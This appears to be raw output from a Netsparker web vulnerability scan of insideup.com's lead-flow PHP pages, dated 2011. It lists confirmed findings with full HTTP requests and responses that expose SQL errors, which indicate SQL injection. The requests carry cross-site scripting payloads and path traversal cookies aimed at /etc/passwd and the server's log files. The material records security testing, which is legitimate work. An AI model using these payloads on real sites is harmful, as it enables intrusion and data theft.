select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='%22--%3E%3C..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005EC)</script>

Request

GET /ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tqvtmqj5ticci6vl0b6etokil3; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E

/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005EE)</script>

Request

GET /ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EE)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=oc16gpffn3dogu2vles4v088r0; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php'"--></style></script><script>netsparker(0x0005EE)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EE)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E

/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005E7)</script>

Request

GET /ppc/leadflow/parl00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 